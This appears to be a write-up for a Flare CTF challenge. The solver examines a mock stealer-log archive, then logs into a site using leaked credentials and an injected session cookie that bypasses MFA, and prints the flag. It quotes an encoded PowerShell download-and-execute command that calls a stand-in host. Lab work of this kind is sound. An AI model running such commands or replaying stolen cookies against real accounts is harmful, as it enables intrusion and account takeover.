Week6
π Week 6
| Category | Author |
|---|---|
| π Web | Flare.io |
Challenge Prompt
Challenge #6 of the Flare CTF is now live and this one leaves a mess behind.
Stealer logs. Malware remnants. Files recovered from places they should not exist. Somewhere in the noise is a story of execution, intent, and consequence.
This challenge rewards careful analysis and patience. What happened is already over. What matters is whether you can log back in.
This week, 100 adventurers will claim the prize.
Guidelines for All Artifact Readers
- The quest appears first in the Flare Academy Discord, then on LinkedIn one hour later
- Recover the hidden flag to claim this weekβs reward
- Flags double as discount codes at checkout. Format flare{β¦}
- One artifact per adventurer, to keep the realm in balance
Begin the Investigation: https://cdn.shopify.com/s/files/1/0956/9399/6351/files/xog5nu.zip?v=1766522338
Claim the Prize: https://merch.flare.io/
The system has already been breached. Now prove you understand how.
Problem Type
- Web
- Cookies
Solve
Clicking the link gives us a zip archive of files. So, letβs extract the files and examine the contents.
When we extract the archive we see that there is a folder called FREE-LOGZ inside:
Within that folder we have several files and folders, we will start by examining the contents of each file:
In Clipboard.txt we have a Base64 encoded PowerShell command:
1
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand aWV4IChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vY2MtbWFzdGVyLmZsci9wYXlsb2FkLnBzMScpOw==
If we Base64 decode that using CyberChef, we get:
1
iex (New-Object Net.WebClient).DownloadString('http://cc-master.flr/payload.ps1');
.flr isnβt a valid domain so this is just a distraction.
Inside the Chrome folder things get interesting. There are 2 folders in here Porfile 1 and Profile 2.
I looked at each of these and there are lots of websites that end with .flr and .ctf which are not valid domains, but in the Profile 2 folder the Cookies.txt file has something interesting.
technotunez.com is a valid website, letβs check it out!
We are presented with a login portal:
In the Passwords.txt file, we have a username and password for this site to try:
1
2
3
URL: https://technotunez.com/
USER: j.parker
PASS: Droplet_Manager_99
Now we are brought to an MFA page:
What if we try to use that cookie from the Cookies.txt file! We will press F12 on the keyboard to jump into developer mode, then click on the Storage tab and then Cookies.
Now we will add our cookie. Cookies follow the Netscape HTTP Cookie Format:
- Domain
- Flag (True if domain begins with a dot - subdomain wildcard)
- Path
- Secure (True if connection must be HTTPS)
- Expiration (Unix timestamp)
- Name
- Value
So we click the + in the top right to add our cookie.
1
2
.technotunez.com TRUE / TRUE 1766332822 session 0xjparks.ai5wYXJrczpsb2dnZWRpbg
Domain Subdomain Path Secure Expires Name Value
It shoud look like this in Chrome:
Reload the page and you are logged in and the flag is visible!
Flag
flare{c00k13_m0nst3r_logz_992}